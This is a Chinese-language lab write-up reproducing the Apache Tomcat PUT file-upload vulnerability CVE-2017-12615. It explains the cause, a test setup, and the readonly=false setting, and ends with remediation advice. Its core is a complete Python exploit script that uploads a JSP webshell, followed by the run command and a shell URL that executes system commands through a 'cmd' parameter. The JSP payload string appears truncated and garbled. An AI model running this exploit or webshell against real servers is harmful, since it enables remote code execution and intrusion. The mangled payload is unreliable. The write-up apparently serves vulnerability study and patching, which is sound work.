漏洞原理
Tomcat的Servlet是在conf/web.xml配置的,通过配置文件可知,当后缀名为.jsp和.jspx的时候是通过JspServlet处理请求的,而其他的精通文件是通过DefaultServlet处理的可以得知:"1.jsp "(末尾有一个空格)并不能匹配到JspServlet,而是会交由DefaultServlet去处理当处理PUT请求时:会调用resources.bind:dirContext为FileDirContext:调用rebind创建文件又由于Windows不允许" "(空格)作为文件名结尾,所以会创建一个".jsp"文件,导致代码执行
漏洞环境
漏洞靶机 Win 2003x64 :192.168.136.136PC主机(Python环境) :192.168.1.103漏洞存在范围:Tomcat-7.0.0-Tomcat-7.0.81
环境搭建
win 2003x64 安装 Java环境Tomcat7.0.75下载:http://archive.apache.org/dist/tomcat/tomcat-7/v7.0.75/bin/apache-tomcat-7.0.75.exe
开启HTTP PUT
找到Tomcat的安装目录下的conf的web.xml
readonly Is this context "read only", so HTTPcommands like PUT and DELETE are rejected? [true] 这个意思就是说:当前是只读模式,是不允许修改的
找到org.apache.catalina.servlets.DefaultServlet方法:
添加如下代码并保存:
readonlyfalse
修改完之后,重启Tomcat:
漏洞复现
Python EXP:
#! -*- coding:utf-8 -*- import httplib import sys import time body = '''"+excuteCmd(request.getParameter("cmd"))+"
");}else{out.println("Test By Power_Liu");}%>''' try: conn = httplib.HTTPConnection(sys.argv[1]) conn.request(method='OPTIONS', url='/ffffzz') headers = dict(conn.getresponse().getheaders()) if 'allow' in headers and headers['allow'].find('PUT') > 0 : conn.close() conn = httplib.HTTPConnection(sys.argv[1]) url = "/" + str(int(time.time()))+'.jsp/' #url = "/" + str(int(time.time()))+'.jsp::$DATA' conn.request( method='PUT', url= url, body=body) res = conn.getresponse() if res.status == 201 : #print 'shell:', 'http://' + sys.argv[1] + url[:-7] print 'shell:', 'http://' + sys.argv[1] + url[:-1] elif res.status == 204 : print 'file exists' else: print 'error' conn.close() else: print 'Server not vulnerable' except Exception,e: print 'Error:', e
运行Python-EXP脚本:
python2 tomcat-CVE-2017-12615.py 192.168.136.136:8080得到的shell:http://192.168.136.136:8080/1574766773.jsp
得到一枚Webshell:
访问:http://192.168.136.136:8080/1574766773.jsp?pwd=hacker&cmd=ipconfig
漏洞修复
将Tomcat更新到该漏洞被修复的版本(例如:Tomcat:8.5.23)readonlyinit-param不应该将false首先设置。如果该参数保留到默认(true),则攻击者无法上传文件。最后可以在前端安装WAF等防护软件来阻止PUT和DELETE请求。